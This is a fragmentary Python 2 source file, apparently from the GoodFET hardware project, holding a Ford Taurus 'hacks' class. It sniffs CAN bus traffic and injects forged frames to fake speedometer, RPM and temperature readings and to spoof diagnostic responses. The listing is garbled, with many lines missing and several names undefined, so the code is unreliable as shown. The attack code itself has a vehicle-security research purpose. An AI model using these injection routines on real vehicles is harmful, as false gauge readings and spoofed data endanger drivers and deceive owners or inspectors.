4 import csv, time, argparse;
7 from random import randrange
8 from GoodFETMCPCAN import GoodFETMCPCAN;
9 from experiments import experiments
10 from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication
11 from intelhex import IntelHex;
16 class FordExperiments(experiments):
18 This class is a subclass of experiments and is a car specific module for
19 demonstrating and testing hacks.
21 def __init__(self, dataLocation = "../../contrib/ThayerData/"):
22 GoodFETMCPCANCommunication.__init__(self, dataLocation)
23 #super(FordExperiments,self).__init__(self) #initialize chip
26 def mimic1056(self,packetData,runTime):
29 self.spitSetup(self.freq)
30 #FIGURE out how to clear buffers
31 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
32 packet1 = self.client.rxpacket();
34 packetParsed = self.client.packet2parsed(packet1);
35 #keep sniffing till we read a packet
36 while( packet1 == None or packetParsed.get('sID') != 1056 ):
37 packet1 = self.client.rxpacket()
39 packetParsed = self.client.packet2parsed(packet1)
40 recieveTime = time.time()
41 packetParsed = self.client.packet2parsed(packet1)
42 if( packetParsed['sID'] != 1056):
43 print "Sniffed wrong packet"
45 countInitial = ord(packetParsed['db3']) #initial count value
47 #set data packet to match what was sniffed or at least what was input
50 if(packetData.get(idx) == None):
51 packet.append(ord(packetParsed.get(idx)))
53 packet.append(packetData.get(idx))
55 #### split SID into different regs
56 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
57 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
58 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
59 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
61 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
63 self.client.txpacket(packet);
65 while( (time.time()-recieveTime) < runTime):
66 #care about db3 or packet[8] that we want to count at the rate that it is
67 dT = time.time()-tpast
69 db3 = (countInitial + math.floor((time.time()-recieveTime)/0.2))%255
71 self.client.txpacket(packet)
75 self.client.MCPrts(TXB0=True)
76 tpast = time.time() #update our transmit time on the one before
80 def cycledb1_1056(self,runTime):
84 #FIGURE out how to clear buffers
85 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
86 packet1 = self.client.rxpacket();
88 packetParsed = self.client.packet2parsed(packet1);
89 #keep sniffing till we read a packet
90 while( packet1 == None or packetParsed.get('sID') != 1056 ):
92 packet1 = self.client.rxpacket()
94 packetParsed = self.client.packet2parsed(packet1)
95 recieveTime = time.time()
96 packetParsed = self.client.packet2parsed(packet1)
97 if( packetParsed['sID'] != 1056):
98 print "Sniffed wrong packet"
101 #set data packet to match what was sniffed or at least what was input
104 packet.append(ord(packetParsed.get(idx)))
106 packet[1] = packetValue;
109 #### split SID into different regs
110 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
111 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
112 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
113 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
114 # lower nibble is DLC
115 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
117 self.client.txpacket(packet);
119 while( (time.time()-recieveTime) < runTime):
120 #care about db3 or packet[8] that we want to count at the rate that it is
121 dT = time.time()-tpast
124 #temp = ((packetValue+1))%2
126 # pV = packetValue%255
132 self.client.txpacket(packet)
134 tpast = time.time() #update our transmit time on the one before
137 def getBackground(self,sId):
138 packet1 = self.client.rxpacket();
140 packetParsed = self.client.packet2parsed(packet1);
141 #keep sniffing till we read a packet
142 while( packet1 == None or packetParsed.get('sID') != sId ):
143 packet1 = self.client.rxpacket()
145 packetParsed = self.client.packet2parsed(packet1)
147 #recieveTime = time.time()
150 def cycle4packets1279(self):
151 self.client.serInit()
154 self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False)
155 packetParsed = self.getBackground(1279)
157 if (packetParsed[db0] == 16):
158 # if it's the first of the four packets, replace the value in db7 with 83
159 packetParsed[db7] = 83
160 # transmit new packet
161 self.client.txpacket(packetParsed)
163 # otherwise, leave it alone
164 # transmit same pakcet we read in
165 self.client.txpacket(packetParsed)
166 # print the packet we are transmitting
170 def oscillateTemperature(self,time):
172 self.client.serInit()
174 #FIGURE out how to clear buffers
175 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
176 packetParsed = self.getBackground(1056)
178 #set data packet to match what was sniffed or at least what was input
181 packet.append(ord(packetParsed.get(idx)))
183 packet[1] = packetValue;
186 #### split SID into different regs
187 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
188 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
189 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
190 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
191 # lower nibble is DLC
192 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
194 self.client.txpacket(packet);
195 startTime = tT.time()
196 while( (tT.time()-startTime) < runTime):
197 dt = tT.time()-startTime
198 inputValue = ((2.0*math.pi)/20.0)*dt
199 value = 30*math.sin(inputValue)+130
201 #packet[5] = int(value)
208 self.client.txpacket(packet)
210 #tpast = time.time() #update our transmit time on the one before
215 #reset eveything on the chip
216 self.client.serInit()
218 duration = 20; #seconds
221 listenPacket = [2, 9, 6, 153, 153, 153, 153, 153]
223 #actual response by the car
224 #r1 = [34, 88, 0, 0, 0, 0, 0, 0]
225 #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
226 #r3 = [16, 19, 73, 4, 1, 70, 65, 66]
228 r1 = [34, 88, 0, 0, 0, 0, 0, 0]
229 r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
230 r3 = [16, 19, 73, 160, 159, 70, 65, 66]
233 SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
234 SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
235 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
236 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
237 # lower nibble is DLC
238 r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]]
239 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
240 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
241 # lower nibble is DLC
242 r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]]
243 packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
244 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
245 # lower nibble is DLC
246 r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]]
248 self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True)
250 #filter for the correct packet
251 self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True)
252 self.client.rxpacket()
253 self.client.rxpacket() # flush buffers if there is anything
254 startTime = tT.time()
255 while( (tT.time() -startTime) < duration):
256 packet = self.client.rxpacket()
258 sid = ord(packet[0])<<3 | ord(packet[1])>>5
259 if( sid == listenID):
260 byte3 = ord(packet[6])
261 if( byte3 == listenPacket[3]):
262 print "SendingPackets!"
264 self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True)
266 def mphToByteValue(self, mph):
267 return ( mph + 63.5 ) / 1.617
269 def ByteValuToMph(self, value):
270 return 1.617*ord(packet[9]) - 63.5
272 def setMPH(self, mph):
273 self.client.serInit()
276 self.addFilter([513, 513, 513])
277 self.client.rxpacket()
278 self.client.rxpacket()
279 self.client.rxpacket()
280 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
281 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
283 startTime = time.time()
284 #while((time.time() - startTime) < 10):
288 # catch a packet and check its db4 value
289 while (packet == None):
290 packet=self.client.rxpacket();
292 #print self.client.packet2str(packet)
294 #print "DB4 = %02d " %ord(packet[9])
296 #print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
298 # calculate our new mph and db4 value
300 newSpeed = self.mphToByteValue(mph)
301 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
304 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
305 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
306 # lower nibble is DLC
307 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
309 # load new packet into TXB0 and check time
310 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
311 starttime = time.time()
313 # spit new value for 1 second
314 while (time.time()-starttime < 10):
315 self.multiPacketSpit(packet0rts=True)
318 def speedometerHack(self, inputs):
320 self.client.serInit()
323 self.addFilter([513, 513, 513])
325 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
326 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
332 # catch a packet and check its db4 value
333 while (packet == None):
334 packet=self.client.rxpacket();
336 print self.client.packet2str(packet)
338 print "DB4 = %02d " %ord(packet[9])
339 mph = 1.617*ord(packet[9]) - 63.5
340 print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
342 # calculate our new mph and db4 value
343 mph = mph + inputs[0];
344 newSpeed = ( mph + 63.5 ) / 1.617
345 print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
348 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
349 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
350 # lower nibble is DLC
351 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
353 # load new packet into TXB0 and check time
354 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
355 starttime = time.time()
357 # spit new value for 1 second
358 while (time.time()-starttime < 1):
359 self.multiPacketSpit(packet0rts=True)
361 def rpmToByteValue(self, rpm):
362 value = ( rpm + 61.88 ) / 64.5
365 def ValueTorpm(self, value):
366 rpm = 64.5*value - 61.88
369 def setRPM(self, rpm):
370 self.client.serInit()
373 self.addFilter([513, 513, 513,513])
375 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
376 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
379 self.client.rxpacket()
380 self.client.rxpacket()
381 self.client.rxpacket()
383 startTime = tT.time()
384 while((tT.time() - startTime )< 10):
388 # catch a packet and check its db4 value
389 while (packet == None):
390 packet=self.client.rxpacket();
392 #print self.client.packet2str(packet)
394 #print "DB4 = %02d " %ord(packet[5])
396 #print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
398 newRPM = self.rpmToByteValue(rpm)
399 #print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
402 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
403 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
404 # lower nibble is DLC
405 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
407 # load new packet into TXB0 and check time
408 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
409 starttime = time.time()
411 # spit new value for 1 second
412 while (time.time()-starttime < 1):
413 self.multiPacketSpit(packet0rts=True)
415 def rpmHack(self, inputs):
417 This method will increase the rpm by the given rpm amount.
420 @param inputs: Single element of a list that corresponds to the amount the user
424 self.client.serInit()
427 self.addFilter([513, 513, 513])
429 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
430 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
431 startTime = tT.time()
432 while((tT.time() - startTime )< 10):
436 # catch a packet and check its db4 value
437 while (packet == None):
438 packet=self.client.rxpacket();
440 print self.client.packet2str(packet)
442 print "DB4 = %02d " %ord(packet[5])
443 rpm = 64.5*ord(packet[5]) - 61.88
444 print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
446 # calculate our new mph and db4 value
447 rpm = rpm + inputs[0];
448 newRPM = ( rpm + 61.88 ) / 64.5
449 print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
452 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
453 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
454 # lower nibble is DLC
455 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
457 # load new packet into TXB0 and check time
458 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
459 starttime = time.time()
461 # spit new value for 1 second
462 while (time.time()-starttime < 1):
463 self.multiPacketSpit(packet0rts=True)
466 def runOdometer(self):
469 if __name__ == "__main__":
471 parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\
473 Run Hacks on a Ford taurus 2004:
479 parser.add_argument('verb', choices=['speedometerHack', 'rpmHack']);
480 parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None);
483 args = parser.parse_args();
484 inputs = args.variable
485 fe = FordExperiments("../../contrib/ThayerData/");
487 if( args.verb == 'speedometerHack'):
488 fe.speedometerHack(inputs=inputs)
489 if( args.verb == 'rpmHack'):
490 fe.rpmHack(inputs=inputs)
491 elif( args.verb == 'fakeVIN'):